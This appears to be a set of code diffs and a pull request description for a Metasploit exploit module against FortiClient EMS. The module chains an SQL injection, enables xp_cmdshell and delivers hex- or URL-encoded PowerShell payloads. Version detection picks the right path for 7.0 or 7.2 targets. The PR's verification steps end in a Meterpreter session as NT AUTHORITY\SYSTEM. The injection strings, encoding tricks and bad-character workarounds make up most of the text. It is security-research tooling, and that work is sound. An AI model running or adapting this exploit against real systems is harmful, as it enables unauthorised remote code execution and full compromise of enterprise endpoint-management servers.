+      return CheckCode::Appears("Version detected: #{@version}")
+    end
+    CheckCode::Safe("Version detected: #{@version}")
   end
 
   def fully_url_encode(string)
@@ -175,38 +257,22 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     # Things to note:
-    # 1. xp_cmdshell is disabled by default so first we must enable it.
-    # 2. The application takes the SQL statement we inject into and converts it all to upper case. This was causing
-    # attempted Base64 encoded payloads to fail, and is why we send the payload has a hex string and decode it using SQL
-    # before running the command with xp_command shell.
-    # 3. We expect to see KA_INTERVAL in the response to every SQLi attempt except for when we deliver the payload which
-    # is when we expect the response to be empty.
-    # inject = [
-    #   "' OR 1=1; exec master.dbo.sp_configure 'show advanced options', 1;--",
-    #   "' OR 1=1; reconfigure;--",
-    #   "' OR 1=1; exec master.dbo.sp_configure 'xp_cmdshell',1;--",
-    #   "' OR 1=1; reconfigure;--",
-    #   "' OR 1=1; DECLARE @SQL VARCHAR(#{payload.encoded.length}) = CONVERT(VARCHAR(MAX), 0X#{payload.encoded.unpack('H*').first}); exec master.dbo.xp_cmdshell @sql;--",
-    # ]
-    command = "notepad.exe"
-    print_status("Encoding command #{command}")
-    print_status("URL Encoded version of the command: #{fully_url_encode(command)}")
-    payload = <<~PLOAD
-powershell.exe -command ""notepad.exe""
-PLOAD
+    # 1. xp_cmdshell is disabled by default so we must enable it.
+    # 2. The application takes the SQL statement we inject into and converts the string to upper case. This is why the
+    #    payload is converted to a case insensitive encoding like URL or hex before running the command with xp_command shell.
+    # 3. We don't expect a response when delivering the payload
+    # 4. The double quote is a bad char in the SQLi for 7.0.x versions
+    # 5. The equals sign is a bad char in the SQLi for 7.2.x versions
 
-    payload = payload.chomp
-    print_status("Payload is: #{payload}")
-    inject = [
-      "'; exec master.dbo.sp_configure 'show advanced options', 1; reconfigure; exec master.dbo.sp_configure 'xp_cmdshell',1; reconfigure; exec master.dbo.xp_cmdshell '#{payload}';--",
-    ]
+    @version ||= get_version
 
-    inject.each do |sqli|
-      if sqli == inject.last
-        send_message(sqli).empty? ? print_good("The SQLi: #{sqli} was executed successfully") : fail_with(Failure::UnexpectedReply, 'The SQLi injection response indicated the injection was unsuccessful.')
-      else
-        send_message(sqli).include?('KA_INTERVAL') ? print_good("The SQLi: #{sqli} was executed successfully") : fail_with(Failure::UnexpectedReply, 'The SQLi injection response indicated the injection was unsuccessful.')
-      end
+    if @version >= Rex::Version.new('7.2')
+      pload = "EXEC xp_cmdshell 'POWERSHELL.EXE -COMMAND \"\"Add-Type -AssemblyName System.Web; CMD.EXE /C ([SYSTEM.WEB.HTTPUTILITY]::URLDECODE(\"\"\"#{fully_url_encode(payload.encoded)}\"\"\"))\"\"'"
+    else
+      pload = "DECLARE @SQL VARCHAR(#{payload.encoded.length}) = CONVERT(VARCHAR(MAX), 0X#{payload.encoded.unpack('H*').first}); exec xp_cmdshell @sql"
     end
+
+    sqli_injection = "';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; #{pload};--"
+    send_message(get_message(sqli_injection)).empty? ? print_good("The SQLi: #{sqli_injection} was executed successfully") : print_error('The SQLi injection response indicated the injection was unsuccessful.')
   end
 end

--- a/modules/exploits/windows/http/forticlient_ems_fctid_sqli.rb
+++ b/modules/exploits/windows/http/forticlient_ems_fctid_sqli.rb
@@ -168,6 +168,11 @@ class MetasploitModule < Msf::Exploit::Remote
     CheckCode::Unknown("#{peer} - FmcDaemon.exe does not appear to be running on the endpoint targeted")
   end
 
+  def fully_url_encode(string)
+    string.chars.map { |char| '%' + char.ord.to_s(16).upcase }.join
+  end
+
+
   def exploit
     # Things to note:
     # 1. xp_cmdshell is disabled by default so first we must enable it.
@@ -176,13 +181,26 @@ class MetasploitModule < Msf::Exploit::Remote
     # before running the command with xp_command shell.
     # 3. We expect to see KA_INTERVAL in the response to every SQLi attempt except for when we deliver the payload which
     # is when we expect the response to be empty.
+    # inject = [
+    #   "' OR 1=1; exec master.dbo.sp_configure 'show advanced options', 1;--",
+    #   "' OR 1=1; reconfigure;--",
+    #   "' OR 1=1; exec master.dbo.sp_configure 'xp_cmdshell',1;--",
+    #   "' OR 1=1; reconfigure;--",
+    #   "' OR 1=1; DECLARE @SQL VARCHAR(#{payload.encoded.length}) = CONVERT(VARCHAR(MAX), 0X#{payload.encoded.unpack('H*').first}); exec master.dbo.xp_cmdshell @sql;--",
+    # ]
+    command = "notepad.exe"
+    print_status("Encoding command #{command}")
+    print_status("URL Encoded version of the command: #{fully_url_encode(command)}")
+    payload = <<~PLOAD
+powershell.exe -command ""notepad.exe""
+PLOAD
+
+    payload = payload.chomp
+    print_status("Payload is: #{payload}")
     inject = [
-      "' OR 1=1; exec master.dbo.sp_configure 'show advanced options', 1;--",
-      "' OR 1=1; reconfigure;--",
-      "' OR 1=1; exec master.dbo.sp_configure 'xp_cmdshell',1;--",
-      "' OR 1=1; reconfigure;--",
-      "' OR 1=1; DECLARE @SQL VARCHAR(#{payload.encoded.length}) = CONVERT(VARCHAR(MAX), 0X#{payload.encoded.unpack('H*').first}); exec master.dbo.xp_cmdshell @sql;--",
+      "'; exec master.dbo.sp_configure 'show advanced options', 1; reconfigure; exec master.dbo.sp_configure 'xp_cmdshell',1; reconfigure; exec master.dbo.xp_cmdshell '#{payload}';--",
     ]
+
     inject.each do |sqli|
       if sqli == inject.last
         send_message(sqli).empty? ? print_good("The SQLi: #{sqli} was executed successfully") : fail_with(Failure::UnexpectedReply, 'The SQLi injection response indicated the injection was unsuccessful.')

--- a/modules/exploits/windows/http/forticlient_ems_fctid_sqli.rb
+++ b/modules/exploits/windows/http/forticlient_ems_fctid_sqli.rb
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def get_register_info
     if @version >= Rex::Version.new('7.2')
-      vprint_status("Returning SYSINFO for 7.2 target")
+      vprint_status('Returning SYSINFO for 7.2 target')
       register_info = <<~REGISTER_INFO
         FCTOS=WIN64
         OSVER=Microsoft Windows 10 Professional Edition, 64-bit (build 19045)
@@ -123,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Remote
         EP_APPCTRLCHKSUM=0
       REGISTER_INFO
     else
-      vprint_status("Returning SYSINFO for 7.0 target")
+      vprint_status('Returning SYSINFO for 7.0 target')
       register_info = <<~REGISTER_INFO
         AVSIG_VER=1.00000
         REG_KEY=_
@@ -176,7 +176,7 @@ class MetasploitModule < Msf::Exploit::Remote
     Rex::Text.encode_base64(register_info)
   end
 
-    def get_version
+  def get_version
     message = "MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD\n"
     message << "SIZE=    {SIZE_PLACEHOLDER}\n"
     message << "X-FCCK-PROBE: PROBE_FEATURE_BITMAP0|1|\n"
@@ -193,9 +193,9 @@ class MetasploitModule < Msf::Exploit::Remote
     # 7.0.7:
     # FGT|FCTEMS0000125975:dc2.kerberos.issue|FEATURE_BITMAP|7|EMSVER|7000007|
     if buf =~ /EMSVER\|(\d{2})(\d{2})(\d{3})\|/
-      major = ($1.to_i / 10)
-      minor = $2.to_i
-      patch = $3.to_i
+      major = (::Regexp.last_match(1).to_i / 10)
+      minor = ::Regexp.last_match(2).to_i
+      patch = ::Regexp.last_match(3).to_i
       return Rex::Version.new("#{major}.#{minor}.#{patch}")
     end
     nil
@@ -222,7 +222,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def send_message(message)
-
     vprint_status("Sending the following message:\n #{message}")
 
     buf = ''
@@ -240,20 +239,19 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-
     @version = get_version
     return CheckCode::Unknown("#{peer} - Version info was unable to be extracted from the target. FmcDaemon.exe might not be running.") unless @version
 
     if @version.between?(Rex::Version.new('7.2.0'), Rex::Version.new('7.2.2')) || @version.between?(Rex::Version.new('7.0.1'), Rex::Version.new('7.0.10'))
       return CheckCode::Appears("Version detected: #{@version}")
     end
+
     CheckCode::Safe("Version detected: #{@version}")
   end
 
   def fully_url_encode(string)
     string.chars.map { |char| '%' + char.ord.to_s(16).upcase }.join
   end
-
 
   def exploit
     # Things to note:


### PR DESCRIPTION
This vulnerability affects FortiClient EMS targets in the 7.0 and 7.2 version ranges. When I wrote the module originally I was only able to get a 7.0 installer and assumed that the exploit path was the same for both version ranges. This assumption was incorrect and the module was not working for 7.2 targets.

The different between the two affected version ranges is that the vulnerable source on 7.2 uses the equals sign as a delimiter and thus it cannot be used as apart of the SQLi injection. The equals sign was being used in the 7.0 exploit mainly because double quotes were not allowed in the 7.0 SQLi - so to work around that limitation the payload was assigned to a variable in SQL, using an equals sign, before being executed like so:
```
DECLARE @SQL VARCHAR(#{payload.encoded.length}) = CONVERT(VARCHAR(MAX), 0X#{payload.encoded.unpack('H*').first}); exec xp_cmdshell @sql
```

Now that double quotes are allowed in the SQLi we can use PowerShell to decode a URL encoded payload thus allowing us to deliver a case insensitive payload to the target successfully:
```
EXEC xp_cmdshell 'POWERSHELL.EXE -COMMAND \"\"Add-Type -AssemblyName System.Web; CMD.EXE /C ([SYSTEM.WEB.HTTPUTILITY]::URLDECODE(\"\"\"#{fully_url_encode(payload.encoded)}\"\"\"))\"\"'
```
Note that the application converts the entire SQL statement being injected into to upper case making case sensitive encodings like Base64 not a viable solution. 

This PR also adds version detection capability so that the appropriate exploit path can be chosen for the target. The payload differs for each version range as well as the necessary metadata sent along side the payload in `X-FCCK-REGISTER:SYSINFO` 

## Verification
The module has been retested on both 7.0.7 and 7.2.2

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Start msfconsole
- [ ] Do: `use windows/http/forticlient_ems_fctid_sqli`
- [ ] Set the `RHOST` and `LHOST` options
- [ ] Run the module
- [ ] Receive a Meterpreter session running in the context of `NT AUTHORITY\SYSTEM`
